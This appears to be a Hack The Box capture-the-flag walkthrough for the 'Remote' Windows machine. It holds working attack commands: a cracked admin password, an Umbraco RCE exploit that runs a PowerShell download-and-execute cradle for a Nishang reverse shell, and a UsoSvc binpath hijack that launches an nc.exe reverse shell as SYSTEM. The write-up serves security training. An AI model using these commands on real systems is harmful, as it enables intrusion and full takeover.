Hack The Box - Remote


This box is really a good and easy one. There ia a webpage running and we can find the backup of the webpage in NFS service. It contains username and password and the Web service have a CVE which helps to get shell and getting System is by Token Impersonatation.

Link: https://www.hackthebox.eu/home/machines/profile/234

Let’s Begin with our Initial Nmap Scan.

Nmap Scan Results

21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows 10 1511 (90%), Microsoft Windows 10 1703 (90%), Microsoft Windows Server 2008 SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m36s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-24T04:50:45
|_  start_date: N/A

FTP Enumeration

I did anonymous login and there is nothing there.

root@w0lf:~# ftp
Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

NFS Enumeration

Since the port 2049 is open and nfs service is also running on it. So there may be share is available.

root@w0lf:~/CTF/HTB/Boxes/Remote# showmount -e
Export list for
/site_backups (everyone)
root@w0lf:~/CTF/HTB/Boxes/Remote# mount ~/CTF/HTB/Boxes/Remote/mount
root@w0lf:~/CTF/HTB/Boxes/Remote# cd mount/
root@w0lf:~/CTF/HTB/Boxes/Remote/mount# ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config

There is something called Umbraco.

What is Umbraco?

  • Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft based infrastructure.

So this must be running on the WebServer. Let’s confirm this now.



There is a lot of files in the mounted share so I searched for any important files in Umbraco and found this.


So it mentioned a file called Umbraco.sdf must contain user details.

Its not in readable format so I used strings

root@w0lf:~/CTF/HTB/Boxes/Remote/mount/App_Data# strings Umbraco.sdf | less


I take the admin@htb.local hash and cracked it using Crackstation. admin@htb.local : baconandcheese


While searching about Umbraco I found there is an exploit available for the version 7.12.4. Let’s confirm whether this is also same version.

root@w0lf:~/CTF/HTB/Boxes/Remote/mount# cat Web.config | grep umbracoConfigurationStatus
		<add key="umbracoConfigurationStatus" value="7.12.4" />

Lets check whether this exploit works. https://github.com/noraj/Umbraco-RCE

root@w0lf:~/CTF/HTB/Boxes/Remote/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i '' -c whoami
iis apppool\defaultapppool

It working, why don’t we upload a reverse shell with nishang. I used nishang/Shells/Invoke-PowerShellTcp.ps1 and copied that to my directory.

Getting a Shell

Step 1:

Started python server on my machine.

root@w0lf:~/CTF/HTB/Boxes/Remote# python -m SimpleHTTPServer
Serving HTTP on port 8000 ...

Step 2:

If we look at the Shell it gives us some of the examples.

PS > Invoke-PowerShellTcp -Reverse -IPAddress -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on 
the given IP and port.

I copied the example and changed it to my IP and paste it at the bottom of the file.


Step 3:

Its time to run the exploit:

python exploit.py -u admin@htb.local -p baconandcheese -i '' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('')"


We got the shell. And user flag is in C:\Users\Public

Privilege Escalation

Uploaded Powerup to the machine. Found something Interesting.


There is a CVE available for this service, you can refer PayloadsAllTheThings or you can also the PowerUP AbuseFunction command to abuse it.

By Following it, Uploaded nc.exe to the box.

certutil -urlcache -split -f
PS C:\Users\Public\Downloads> sc.exe stop UsoSvc
PS C:\Users\Public\Downloads> sc.exe config UsoSvc binpath= "C:\Users\Public\Downloads\nc.exe 5555 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS
PS C:\Users\Public\Downloads> sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS

        TYPE               : 20  WIN32_SHARE_PROCESS 
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Public\Downloads\nc.exe 5555 -e cmd.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
PS C:\Users\Public\Downloads> sc.exe start UsoSvc

We changed the Binary Path and If we restart the service. It will run my nc command.

And I got the shell


We Own the Root!